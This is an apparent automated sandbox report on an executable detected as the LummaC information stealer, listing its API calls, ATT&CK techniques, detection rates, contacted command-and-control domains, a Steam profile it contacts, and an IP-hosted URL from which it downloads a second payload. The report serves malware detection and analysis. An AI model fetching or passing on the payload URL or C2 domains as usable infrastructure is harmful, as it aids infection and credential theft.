Source: 89AC.tmp.exe	String found in binary or memory: skidjazzyric.click

Source: C:\Users\user\Desktop\NDWffRLk7z.exe

Process created: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe "C:\Users\user\AppData\Local\Temp\89AC.tmp.exe"

Jump to behavior

Source: C:\Users\user\Desktop\NDWffRLk7z.exe

Code function: 4_2_0041076B cpuid

4_2_0041076B

Source: C:\Users\user\Desktop\NDWffRLk7z.exe	Code function: GetLocaleInfoW,	4_2_004351B0
Source: C:\Users\user\Desktop\NDWffRLk7z.exe	Code function: EnumSystemLocalesW,	4_2_0043B272
Source: C:\Users\user\Desktop\NDWffRLk7z.exe	Code function: EnumSystemLocalesW,	4_2_0043B2BD
Source: C:\Users\user\Desktop\NDWffRLk7z.exe	Code function: EnumSystemLocalesW,	4_2_0043B358
Source: C:\Users\user\Desktop\NDWffRLk7z.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	4_2_0043B3E5
Source: C:\Users\user\Desktop\NDWffRLk7z.exe	Code function: GetLocaleInfoW,	4_2_0043B635
Source: C:\Users\user\Desktop\NDWffRLk7z.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	4_2_0043B75E
Source: C:\Users\user\Desktop\NDWffRLk7z.exe	Code function: GetLocaleInfoW,	4_2_0043B865
Source: C:\Users\user\Desktop\NDWffRLk7z.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	4_2_0043B932
Source: C:\Users\user\Desktop\NDWffRLk7z.exe	Code function: EnumSystemLocalesW,	4_2_00434DBD
Source: C:\Users\user\Desktop\NDWffRLk7z.exe	Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	4_2_0043AFFA
Source: C:\Users\user\Desktop\NDWffRLk7z.exe	Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	4_2_0214B261
Source: C:\Users\user\Desktop\NDWffRLk7z.exe	Code function: EnumSystemLocalesW,	4_2_02145024
Source: C:\Users\user\Desktop\NDWffRLk7z.exe	Code function: GetLocaleInfoW,	4_2_02145417
Source: C:\Users\user\Desktop\NDWffRLk7z.exe	Code function: EnumSystemLocalesW,	4_2_0214B4D9
Source: C:\Users\user\Desktop\NDWffRLk7z.exe	Code function: EnumSystemLocalesW,	4_2_0214B524
Source: C:\Users\user\Desktop\NDWffRLk7z.exe	Code function: EnumSystemLocalesW,	4_2_0214B5BF
Source: C:\Users\user\Desktop\NDWffRLk7z.exe	Code function: GetLocaleInfoW,	4_2_0214BACC
Source: C:\Users\user\Desktop\NDWffRLk7z.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	4_2_0214BB99
Source: C:\Users\user\Desktop\NDWffRLk7z.exe	Code function: GetLocaleInfoW,	4_2_0214B892
Source: C:\Users\user\Desktop\NDWffRLk7z.exe	Code function: GetLocaleInfoW,	4_2_0214B89C
Source: C:\Users\user\Desktop\NDWffRLk7z.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	4_2_0214B9C5

Source: C:\Users\user\Desktop\NDWffRLk7z.exe

Code function: 4_2_004103BD GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

4_2_004103BD

Source: C:\Users\user\Desktop\NDWffRLk7z.exe

Code function: 4_2_004163DA GetVersionExW,Concurrency::details::platform::InitializeSystemFunctionPointers,Concurrency::details::WinRT::Initialize,__CxxThrowException@8,

4_2_004163DA

Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Amcache.hve.10.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.10.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.10.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.10.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: Amcache.hve.10.dr	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match

File source: decrypted.memstr, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match

File source: decrypted.memstr, type: MEMORYSTR

Source: C:\Users\user\Desktop\NDWffRLk7z.exe	Code function: 4_2_004218BC Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::InternalContextBase::SwitchOut,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::InternalContextBase::SwitchTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,	4_2_004218BC
Source: C:\Users\user\Desktop\NDWffRLk7z.exe	Code function: 4_2_00420BE6 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,	4_2_00420BE6
Source: C:\Users\user\Desktop\NDWffRLk7z.exe	Code function: 4_2_02131B23 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::InternalContextBase::SwitchOut,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::InternalContextBase::SwitchTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,	4_2_02131B23
Source: C:\Users\user\Desktop\NDWffRLk7z.exe	Code function: 4_2_02130E4D Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,	4_2_02130E4D

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Native API	1 DLL Side-Loading	11 Process Injection	1 Masquerading	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Screen Capture	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 PowerShell	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Virtualization/Sandbox Evasion	LSASS Memory	1 Query Registry	Remote Desktop Protocol	1 Archive Collected Data	12 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	11 Process Injection	Security Account Manager	131 Security Software Discovery	SMB/Windows Admin Shares	3 Clipboard Data	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	11 Deobfuscate/Decode Files or Information	NTDS	1 Virtualization/Sandbox Evasion	Distributed Component Object Model	Input Capture	123 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	4 Obfuscated Files or Information	LSA Secrets	1 Process Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	22 Software Packing	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	2 File and Directory Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	24 System Information Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
NDWffRLk7z.exe	40%	Virustotal		Browse
NDWffRLk7z.exe	58%	ReversingLabs	Win32.Trojan.AceCrypter
NDWffRLk7z.exe	100%	Avira	HEUR/AGEN.1312582
NDWffRLk7z.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\ScreenUpdateSync[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\ScreenUpdateSync[1].exe	50%	ReversingLabs	Win32.Trojan.CrypterX
C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	50%	ReversingLabs	Win32.Trojan.CrypterX

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://176.113.1	0%	Avira URL Cloud	safe
http://176.113.115.19/ScreenUpdateSync.exek	0%	Avira URL Cloud	safe
http://176.113.115.19/ScreenUpdateSync.exe5h48t4j4t1rrSOFTWARE	0%	Avira URL Cloud	safe
http://176.113.115.19/ScreenUpdateSync.exep	0%	Avira URL Cloud	safe
https://post-to-me.com/track_prt.php?sub=0&cc=DEPL	100%	Avira URL Cloud	malware
http://176.113.115.19/	0%	Avira URL Cloud	safe
http://176.113.115.19/ScreenUpdateSync.exeom	0%	Avira URL Cloud	safe
http://176.113.115.19/ScreenUpdateSync.exe#	100%	Avira URL Cloud	malware
http://176.113.115.19/ScreenUpdateSync.exean	0%	Avira URL Cloud	safe
http://176.113.115.19/ScreenUpdateSync.exev8	0%	Avira URL Cloud	safe
http://176.113.115.19/ScreenUpdateSync.exeT	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
post-to-me.com	172.67.179.207	true	false	high
steamcommunity.com	104.102.49.254	true	false	high
femalsabler.shop	unknown	unknown	false	high
robinsharez.shop	unknown	unknown	false	high
soundtappysk.shop	unknown	unknown	false	high
crowdwarek.shop	unknown	unknown	false	high
versersleep.shop	unknown	unknown	false	high
skidjazzyric.click	unknown	unknown	false	high
chipdonkeruz.shop	unknown	unknown	false	high
apporholis.shop	unknown	unknown	false	high
handscreamny.shop	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Reputation
robinsharez.shop	false	high
crowdwarek.shop	false	high
skidjazzyric.click	false	high
femalsabler.shop	false	high
https://steamcommunity.com/profiles/76561199724331900	false	high
soundtappysk.shop	false	high
apporholis.shop	false	high
chipdonkeruz.shop	false	high
versersleep.shop	false	high
https://post-to-me.com/track_prt.php?sub=0&cc=DE	false	high
handscreamny.shop	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png	89AC.tmp.exe, 00000007.00000003.1381325223.0000000000866000.00000004.00000020.00020000.00000000.sdmp	false		high
https://player.vimeo.com	89AC.tmp.exe, 00000007.00000002.1602056562.0000000000813000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000003.1381850134.000000000082E000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000002.1602159928.000000000082E000.00000004.00000020.00020000.00000000.sdmp	false		high
http://176.113.115.19/ScreenUpdateSync.exek	NDWffRLk7z.exe, 00000004.00000003.1341587383.000000000062B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://176.113.115.19/ScreenUpdateSync.exep	NDWffRLk7z.exe, 00000004.00000003.1341587383.000000000062B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://steamcommunity.com/?subsection=broadcasts	89AC.tmp.exe, 00000007.00000003.1381325223.0000000000866000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store.steampowered.com/subscriber_agreement/	89AC.tmp.exe, 00000007.00000003.1381325223.0000000000866000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.gstatic.cn/recaptcha/	89AC.tmp.exe, 00000007.00000002.1602056562.0000000000813000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000003.1381850134.000000000082E000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000002.1602159928.000000000082E000.00000004.00000020.00020000.00000000.sdmp	false		high
http://176.113.115.19/ScreenUpdateSync.exe	NDWffRLk7z.exe, 00000004.00000003.1341587383.000000000062B000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.valvesoftware.com/legal.htm	89AC.tmp.exe, 00000007.00000003.1381325223.0000000000866000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.youtube.com	89AC.tmp.exe, 00000007.00000002.1602056562.0000000000813000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000003.1381850134.000000000082E000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000002.1602159928.000000000082E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.google.com	89AC.tmp.exe, 00000007.00000002.1602056562.0000000000813000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000003.1381850134.000000000082E000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000002.1602159928.000000000082E000.00000004.00000020.00020000.00000000.sdmp	false		high
http://176.113.115.19/ScreenUpdateSync.exe5h48t4j4t1rrSOFTWARE	NDWffRLk7z.exe, 00000004.00000002.3743818688.0000000000400000.00000040.00000001.01000000.00000004.sdmp	false	Avira URL Cloud: safe	unknown
https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback	89AC.tmp.exe, 00000007.00000003.1381500917.00000000007E8000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000003.1381325223.0000000000866000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000003.1381325223.0000000000863000.00000004.00000020.00020000.00000000.sdmp	false		high
http://176.113.1	NDWffRLk7z.exe, 00000004.00000003.1341587383.000000000062B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6	89AC.tmp.exe, 00000007.00000002.1601827607.00000000007DB000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000003.1381325223.0000000000866000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000003.1381979764.0000000000860000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000003.1381850134.000000000082E000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000002.1602215869.0000000000861000.00000004.00000020.00020000.00000000.sdmp	false		high
https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/	89AC.tmp.exe, 00000007.00000002.1602056562.0000000000813000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000003.1381850134.000000000082E000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000002.1602159928.000000000082E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com/profiles/76561199724331900z	89AC.tmp.exe, 00000007.00000003.1381500917.00000000007EE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl	89AC.tmp.exe, 00000007.00000003.1382256815.000000000082E000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000003.1381325223.0000000000866000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000003.1381850134.000000000082E000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000002.1602159928.000000000082E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC	89AC.tmp.exe, 00000007.00000003.1381325223.0000000000866000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000003.1381979764.0000000000860000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000003.1381850134.000000000082E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://s.ytimg.com;	89AC.tmp.exe, 00000007.00000002.1602056562.0000000000813000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000003.1381850134.000000000082E000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000002.1602159928.000000000082E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1	89AC.tmp.exe, 00000007.00000002.1601827607.00000000007DB000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000003.1381325223.0000000000866000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000003.1381979764.0000000000860000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000003.1381850134.000000000082E000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000002.1602215869.0000000000861000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&	89AC.tmp.exe, 00000007.00000003.1382256815.000000000082E000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000003.1381325223.0000000000866000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000003.1381850134.000000000082E000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000002.1602159928.000000000082E000.00000004.00000020.00020000.00000000.sdmp	false		high
http://176.113.115.19/	NDWffRLk7z.exe, 00000004.00000003.1341587383.000000000062B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://community.fastly.steamstatic.com/	89AC.tmp.exe, 00000007.00000002.1602159928.000000000082E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/css/skin_1/fatalerror.css?v=OFUqlcDNiD6y&l=engli	89AC.tmp.exe, 00000007.00000003.1382256815.000000000082E000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000003.1381325223.0000000000866000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000003.1381850134.000000000082E000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000002.1602159928.000000000082E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steam.tv/	89AC.tmp.exe, 00000007.00000002.1602056562.0000000000813000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000003.1381850134.000000000082E000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000002.1602159928.000000000082E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://post-to-me.com/track_prt.php?sub=0&cc=DEPL	NDWffRLk7z.exe, 00000004.00000002.3748901617.0000000000600000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://post-to-me.com/track_prt.php?sub=&cc=DE	NDWffRLk7z.exe, 00000004.00000002.3743818688.0000000000400000.00000040.00000001.01000000.00000004.sdmp	false		high
http://store.steampowered.com/privacy_agreement/	89AC.tmp.exe, 00000007.00000002.1601827607.00000000007DB000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000003.1381325223.0000000000866000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000003.1381325223.0000000000863000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store.steampowered.com/points/shop/	89AC.tmp.exe, 00000007.00000003.1381325223.0000000000866000.00000004.00000020.00020000.00000000.sdmp	false		high
https://sketchfab.com	89AC.tmp.exe, 00000007.00000002.1602056562.0000000000813000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000003.1381850134.000000000082E000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000002.1602159928.000000000082E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://lv.queniujq.cn	89AC.tmp.exe, 00000007.00000002.1602056562.0000000000813000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000003.1381850134.000000000082E000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000002.1602159928.000000000082E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.youtube.com/	89AC.tmp.exe, 00000007.00000002.1602056562.0000000000813000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000003.1381850134.000000000082E000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000002.1602159928.000000000082E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store.steampowered.com/privacy_agreement/	89AC.tmp.exe, 00000007.00000003.1381325223.0000000000866000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=M_FULq_A	89AC.tmp.exe, 00000007.00000002.1601827607.00000000007DB000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000003.1381325223.0000000000866000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000003.1381979764.0000000000860000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000003.1381850134.000000000082E000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000002.1602215869.0000000000861000.00000004.00000020.00020000.00000000.sdmp	false		high
https://post-to-me.com/track_prt.php?sub=	NDWffRLk7z.exe	false		high
https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am	89AC.tmp.exe, 00000007.00000003.1381325223.0000000000866000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000003.1381979764.0000000000860000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000003.1381850134.000000000082E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.google.com/recaptcha/	89AC.tmp.exe, 00000007.00000002.1602159928.000000000082E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://checkout.steampowered.com/	89AC.tmp.exe, 00000007.00000002.1602159928.000000000082E000.00000004.00000020.00020000.00000000.sdmp	false		high
http://176.113.115.19/ScreenUpdateSync.exeom	NDWffRLk7z.exe, 00000004.00000003.1341587383.000000000062B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://post-to-me.com/	NDWffRLk7z.exe, 00000004.00000002.3748901617.0000000000600000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store.steampowered.com/;	89AC.tmp.exe, 00000007.00000003.1382256815.000000000082E000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000003.1381500917.0000000000813000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000002.1602056562.0000000000813000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000003.1381850134.000000000082E000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000002.1602159928.000000000082E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store.steampowered.com/about/	89AC.tmp.exe, 00000007.00000003.1381325223.0000000000866000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com/my/wishlist/	89AC.tmp.exe, 00000007.00000003.1381325223.0000000000866000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000003.1381979764.0000000000860000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000003.1381850134.000000000082E000.00000004.00000020.00020000.00000000.sdmp	false		high
http://176.113.115.19/ScreenUpdateSync.exean	NDWffRLk7z.exe, 00000004.00000003.1341587383.000000000062B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&	89AC.tmp.exe, 00000007.00000003.1382256815.000000000082E000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000003.1381325223.0000000000866000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000003.1381850134.000000000082E000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000002.1602159928.000000000082E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://help.steampowered.com/en/	89AC.tmp.exe, 00000007.00000003.1381325223.0000000000866000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com/market/	89AC.tmp.exe, 00000007.00000003.1381325223.0000000000866000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store.steampowered.com/news/	89AC.tmp.exe, 00000007.00000003.1381325223.0000000000866000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com/profiles/76561199724331900$	89AC.tmp.exe, 00000007.00000003.1381500917.00000000007E8000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000002.1601957338.00000000007E9000.00000004.00000020.00020000.00000000.sdmp	false		high
http://store.steampowered.com/subscriber_agreement/	89AC.tmp.exe, 00000007.00000002.1601827607.00000000007DB000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000003.1381325223.0000000000866000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000003.1381325223.0000000000863000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org	89AC.tmp.exe, 00000007.00000002.1601827607.00000000007DB000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000003.1381325223.0000000000866000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000003.1381325223.0000000000863000.00000004.00000020.00020000.00000000.sdmp	false		high
https://recaptcha.net/recaptcha/;	89AC.tmp.exe, 00000007.00000002.1602056562.0000000000813000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000003.1381850134.000000000082E000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000002.1602159928.000000000082E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=Eq36AUaEgab8&l=en	89AC.tmp.exe, 00000007.00000003.1382256815.000000000082E000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000003.1381325223.0000000000866000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000003.1381850134.000000000082E000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000002.1602159928.000000000082E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com/discussions/	89AC.tmp.exe, 00000007.00000003.1381325223.0000000000866000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store.steampowered.com/stats/	89AC.tmp.exe, 00000007.00000003.1381325223.0000000000866000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am	89AC.tmp.exe, 00000007.00000003.1381325223.0000000000866000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000003.1381979764.0000000000860000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000003.1381850134.000000000082E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://medal.tv	89AC.tmp.exe, 00000007.00000002.1602056562.0000000000813000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000003.1381850134.000000000082E000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000002.1602159928.000000000082E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://broadcast.st.dl.eccdnx.com	89AC.tmp.exe, 00000007.00000002.1602056562.0000000000813000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000003.1381850134.000000000082E000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000002.1602159928.000000000082E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png	89AC.tmp.exe, 00000007.00000003.1381325223.0000000000866000.00000004.00000020.00020000.00000000.sdmp	false		high
